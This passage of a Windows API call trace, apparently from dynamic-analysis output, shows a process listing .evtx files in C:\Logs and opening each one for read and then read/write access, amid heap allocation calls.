lpWideCharStr=0x75fa8, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 55 [0072.440] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0072.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.440] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SmbClient%4Connectivity.evtx", cAlternateFileName="MI00FB~1.EVT")) returned 1 [0072.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0072.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0072.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0072.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0072.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0072.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0072.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.441] AreFileApisANSI () returned 1 [0072.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx", lpUsedDefaultChar=0x0) returned 55 [0072.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0072.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0072.441] AreFileApisANSI () returned 1 [0072.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0072.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75cd8 [0072.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 55 [0072.441] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.442] GetFileType (hFile=0x420) returned 0x1 [0072.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.442] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.442] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.442] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.442] CloseHandle (hObject=0x420) returned 1 [0072.442] AreFileApisANSI () returned 1 [0072.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0072.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75e40 [0072.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 55 [0072.443] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.443] GetFileType (hFile=0x420) returned 0x1 [0072.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.443] CloseHandle (hObject=0x420) returned 1 [0072.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.443] AreFileApisANSI () returned 1 [0072.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0072.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75e40 [0072.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 55 [0072.444] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0072.444] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.444] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.444] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b042f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97b042f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SMBClient%4Operational.evtx", cAlternateFileName="MID8B0~1.EVT")) returned 1 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0072.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0072.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0072.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0072.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0072.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0072.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.445] AreFileApisANSI () returned 1 [0072.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx", lpUsedDefaultChar=0x0) returned 54 [0072.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0072.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0072.445] AreFileApisANSI () returned 1 [0072.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0072.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75dc8 [0072.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 54 [0072.445] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.446] GetFileType (hFile=0x420) returned 0x1 [0072.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0072.446] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.446] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.446] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.446] CloseHandle (hObject=0x420) returned 1 [0072.446] AreFileApisANSI () returned 1 [0072.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0072.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76278 [0072.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 54 [0072.447] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.447] GetFileType (hFile=0x420) returned 0x1 [0072.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.447] CloseHandle (hObject=0x420) returned 1 [0072.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.447] AreFileApisANSI () returned 1 [0072.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0072.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76188 [0072.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 54 [0072.448] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b042f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97b042f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0072.448] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.448] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 